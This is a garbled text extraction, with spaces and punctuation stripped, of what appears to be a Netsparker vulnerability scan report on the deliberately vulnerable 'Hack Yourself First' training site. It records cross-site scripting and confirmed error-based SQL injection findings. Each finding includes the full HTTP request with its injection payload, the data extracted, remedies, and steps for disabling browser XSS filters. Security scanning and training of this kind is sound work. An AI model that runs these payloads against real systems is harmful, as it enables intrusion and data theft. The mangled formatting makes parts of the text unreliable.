ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
5 TOTALCRITICAL
CONFIRMED
5
2 SQL InjectionNetsparkeridentifiedanSQLinjectionwhichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase
Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications
NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabase
ImpactDependingonthebackenddatabasethedatabaseconnectionsettingsandtheoperatingsystemanattackercanmountoneormoreofthefollowingtypeofattackssuccessfully
ReadingupdatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem
Actions to Take1 Seetheremedyforsolution2 Ifyouarenotusingadatabaseaccesslayer(DAL)considerusingoneThiswillhelpyoucentralizetheissueYoucanalsouseORM(object relational mapping)MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem
3 LocateallofthedynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries(If you decide to use a DALORM changeall legacy code to use these new libraries)
4 Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource
RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements)Almostallmodernlanguagesprovidebuilt-inlibrariesforthisWhereverpossibledonotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation
Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilitiesThisisacomplexareawithmanydependencieshoweveritshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethemSQLinjectionisoneofthemostcommonwebapplicationvulnerabilities
External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet
Remedy ReferencesMSDN-ProtectFromSQLinjectioninASPNET
ClassificationOWASP2010-A1OWASP2013-A1PCIV20-651PCIV30-651CWE-89CAPEC-66WASC-19
21 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101) C
Extracted Datamicrosoft sql azure (rtm) - 110922217 ntaug 20 2014 223756 ntcopyright (c) microsoft corporationn
10 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 209Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=272b+(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)+2b27
ResponsehellipPNETContent-Length 2867Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageConversion failed when converting the varchar value _2dilemma to data typeintExceptionTypeSystemDataSqlClientSqlExceptionStackTrace at SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnectionAction`1 wraphellip
22 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2b
ParametersParameter Type Value
orderBy GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
asc GET false
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET SupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
11 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14292Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
23 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
12 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
24 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
13 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
25 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
14 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
15 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
